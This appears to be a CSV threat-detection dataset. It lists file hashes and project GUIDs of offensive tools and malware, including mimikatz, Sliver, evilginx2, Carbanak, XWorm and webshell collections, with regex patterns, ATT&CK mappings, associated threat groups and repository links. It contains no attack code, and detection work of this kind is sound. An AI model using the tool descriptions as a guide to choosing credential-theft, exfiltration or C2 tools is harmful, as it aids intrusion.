"*81027e82ed224ca43c939b8df5f99bf13e9d2191b177ae4d339075930ab2bb5b*",".{0,1000}81027e82ed224ca43c939b8df5f99bf13e9d2191b177ae4d339075930ab2bb5b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29952"
"*81027e82ed224ca43c939b8df5f99bf13e9d2191b177ae4d339075930ab2bb5b*",".{0,1000}81027e82ed224ca43c939b8df5f99bf13e9d2191b177ae4d339075930ab2bb5b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29953"
"*810950f1d775ffa916c75a85c79bb2a46f7c7250986be7748bfae90b04b33551*",".{0,1000}810950f1d775ffa916c75a85c79bb2a46f7c7250986be7748bfae90b04b33551.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","#filehash","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","29954"
"*810a727dfd8127c192729f6d06f0564300ada683063d0a8fd622e2b338714514*",".{0,1000}810a727dfd8127c192729f6d06f0564300ada683063d0a8fd622e2b338714514.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29955"
"*810b9f7c517f7f00516340661ecaf5610b89ea25ff5261964abe067a40c474c2*",".{0,1000}810b9f7c517f7f00516340661ecaf5610b89ea25ff5261964abe067a40c474c2.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux #filehash","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","29956"
"*811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d*",".{0,1000}811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","29957"
"*811683b1-e01c-4ef8-82d1-aa08293d3e7c*",".{0,1000}811683b1\-e01c\-4ef8\-82d1\-aa08293d3e7c.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","#GUIDproject","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","29958"
"*811b4a92ff8cf7ae50e4edaa23c2d533662a8ce035ba079792bfe21e0457b19b*",".{0,1000}811b4a92ff8cf7ae50e4edaa23c2d533662a8ce035ba079792bfe21e0457b19b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29959"
"*811d06dc2f9560e4d3697c2a5e2aa39f516a582c70ac88e33468810905ced6fa*",".{0,1000}811d06dc2f9560e4d3697c2a5e2aa39f516a582c70ac88e33468810905ced6fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29960"
"*812c4312270a710b3c4bf47ff75abca809aa51d78f3e8a2e6071bd31dda52c6e*",".{0,1000}812c4312270a710b3c4bf47ff75abca809aa51d78f3e8a2e6071bd31dda52c6e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29965"
"*813342bc9592e0e2b5672eb84376b59e098cc45929a42c55bdc96750f2abd5f2*",".{0,1000}813342bc9592e0e2b5672eb84376b59e098cc45929a42c55bdc96750f2abd5f2.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29968"
"*814708C9-2320-42D2-A45F-31E42DA06A94*",".{0,1000}814708C9\-2320\-42D2\-A45F\-31E42DA06A94.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#GUIDproject","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","29971"
"*815533317285b5d53ee050a757d529072b9311106b24f03c79e379109718f84a*",".{0,1000}815533317285b5d53ee050a757d529072b9311106b24f03c79e379109718f84a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29973"
"*8157255bd8b050e5875a4075e26ed8589d56083f3e944df98c3e2fa498e1bfd9*",".{0,1000}8157255bd8b050e5875a4075e26ed8589d56083f3e944df98c3e2fa498e1bfd9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29974"
"*815dfb13e0c4d5040ffb1dde7350cc77f227b2945b01c61bf54f85eefdd182cf*",".{0,1000}815dfb13e0c4d5040ffb1dde7350cc77f227b2945b01c61bf54f85eefdd182cf.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","29976"
"*8160fe6c7c5d98cfa69d14135b925866cf7b28689017d1883ef0b060f0777e5c*",".{0,1000}8160fe6c7c5d98cfa69d14135b925866cf7b28689017d1883ef0b060f0777e5c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29977"
"*8168c7da7b3fc4bec5fef3ad065271c250f383d202f6ff16a2d52c38135c075b*",".{0,1000}8168c7da7b3fc4bec5fef3ad065271c250f383d202f6ff16a2d52c38135c075b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29979"
"*8169F27E-0314-44BB-8B89-DB3339FF51A3*",".{0,1000}8169F27E\-0314\-44BB\-8B89\-DB3339FF51A3.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","29980"
"*816b85da5902d45e9d18f04e8f2e731719ee796e619456ef9cecf365bc79ceee*",".{0,1000}816b85da5902d45e9d18f04e8f2e731719ee796e619456ef9cecf365bc79ceee.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29981"
"*816bac589fcdd14efd90df8fecfadd0b1908dcd18a3617ef9f64170fee14ad5c*",".{0,1000}816bac589fcdd14efd90df8fecfadd0b1908dcd18a3617ef9f64170fee14ad5c.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#filehash","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","29982"
"*816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019*",".{0,1000}816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019.{0,1000}","offensive_tool_keyword","VNCPassView","recover the passwords stored by the VNC tool","T1003 - T1555 - T1081","TA0006 - TA0007","N/A","GoGoogle - 8BASE","Credential Access","https://www.nirsoft.net/utils/vnc_password.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29983"
"*8173d4d17cb728e6f2c5e2ce8124ce7eb0f459dc62085bcaab786abf1f6b37a7*",".{0,1000}8173d4d17cb728e6f2c5e2ce8124ce7eb0f459dc62085bcaab786abf1f6b37a7.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#filehash","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","29984"
"*8177096d8c171e68e1ad0cfae755ad4e7fafa97ef18f5400db34ec157616623a*",".{0,1000}8177096d8c171e68e1ad0cfae755ad4e7fafa97ef18f5400db34ec157616623a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29985"
"*81787aecc793198688ff37685d15c3d6a482c24548b8a42a8f5a438d2a5ef5bf*",".{0,1000}81787aecc793198688ff37685d15c3d6a482c24548b8a42a8f5a438d2a5ef5bf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29986"
"*81853d4c06bb62f9b8f3032d4ac6aff5839fae7c6ecfdde64a4cd6a538df5daf*",".{0,1000}81853d4c06bb62f9b8f3032d4ac6aff5839fae7c6ecfdde64a4cd6a538df5daf.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29987"
"*8185f7a1072ce058afd735f5162861d439a8d81f535a2609896e19c319f25aea*",".{0,1000}8185f7a1072ce058afd735f5162861d439a8d81f535a2609896e19c319f25aea.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29988"
"*8190e7ab106e460cc0e726520b8adf75122e50ce26f0b58db58827c6b6290b97*",".{0,1000}8190e7ab106e460cc0e726520b8adf75122e50ce26f0b58db58827c6b6290b97.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29990"
"*81a130c4d44dacad8a175fef8eeecd9561e938f8cb5de366795a9213b76fe1c7*",".{0,1000}81a130c4d44dacad8a175fef8eeecd9561e938f8cb5de366795a9213b76fe1c7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29993"
"*81a235c1c9cdb34c44f468239bd06a590a54cc4fcd624c676200097b45d55165*",".{0,1000}81a235c1c9cdb34c44f468239bd06a590a54cc4fcd624c676200097b45d55165.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29995"
"*81a235c1c9cdb34c44f468239bd06a590a54cc4fcd624c676200097b45d55165*",".{0,1000}81a235c1c9cdb34c44f468239bd06a590a54cc4fcd624c676200097b45d55165.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29996"
"*81a2d83a2d25f5ff053db7c730e776a0be57bc383cb3754f491a9101ec5888d2*",".{0,1000}81a2d83a2d25f5ff053db7c730e776a0be57bc383cb3754f491a9101ec5888d2.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29997"
"*81b03c89401930471bcb79a16998e446fa63b1412b2bd32cc25e175b0bbd7ee9*",".{0,1000}81b03c89401930471bcb79a16998e446fa63b1412b2bd32cc25e175b0bbd7ee9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29998"
"*81b115a9e1d6c8333dbac2759eadbd56badd489ecc04eadff97217671d789776*",".{0,1000}81b115a9e1d6c8333dbac2759eadbd56badd489ecc04eadff97217671d789776.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","29999"
"*81b24314538ad9dd740093c63a7925f039ccbdcac4e2944fd8cdf238f05ad8fc*",".{0,1000}81b24314538ad9dd740093c63a7925f039ccbdcac4e2944fd8cdf238f05ad8fc.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30000"
"*81c02fac6308e64ef8eba1bf4088b04daf1d33ac295c9a376b31e616cd3d4cec*",".{0,1000}81c02fac6308e64ef8eba1bf4088b04daf1d33ac295c9a376b31e616cd3d4cec.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30001"
"*81c3f4341d0cecc16beaae19c88e54dda2730a4eaf06cc0fea0119822d7482c3*",".{0,1000}81c3f4341d0cecc16beaae19c88e54dda2730a4eaf06cc0fea0119822d7482c3.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","#filehash","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","30002"
"*81c6fe2b2271e9d8ee7921112070316d2855a2c73f5e78515f131ec6265316be*",".{0,1000}81c6fe2b2271e9d8ee7921112070316d2855a2c73f5e78515f131ec6265316be.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30003"
"*81ccd233e6830ef2e6f9e2be11588fa65df5bde1fad76f46d161814f6f18f785*",".{0,1000}81ccd233e6830ef2e6f9e2be11588fa65df5bde1fad76f46d161814f6f18f785.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30005"
"*81cd3e0dfad46b8baf1d60ca5487c459fd64fdfd31340964ad6b4627605ceb5d*",".{0,1000}81cd3e0dfad46b8baf1d60ca5487c459fd64fdfd31340964ad6b4627605ceb5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30006"
"*81d83bf089c11822c0215544c70718ef1577c0d6b27d6f93535ea0b3fdd07f57*",".{0,1000}81d83bf089c11822c0215544c70718ef1577c0d6b27d6f93535ea0b3fdd07f57.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30008"
"*81da530e620cf0c86a3b6a99d562e7c175951d9417264be1dab397c4146814ab*",".{0,1000}81da530e620cf0c86a3b6a99d562e7c175951d9417264be1dab397c4146814ab.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30009"
"*81e1e9186bb461b669b4bbd4dab4534c980e6d2bc27975e6ec7305bc935cf429*",".{0,1000}81e1e9186bb461b669b4bbd4dab4534c980e6d2bc27975e6ec7305bc935cf429.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","30011"
"*81e2c46d9fa49c65a9ad0ab69dd121b110d63dd12242b12619b487532a6fb6ad*",".{0,1000}81e2c46d9fa49c65a9ad0ab69dd121b110d63dd12242b12619b487532a6fb6ad.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30012"
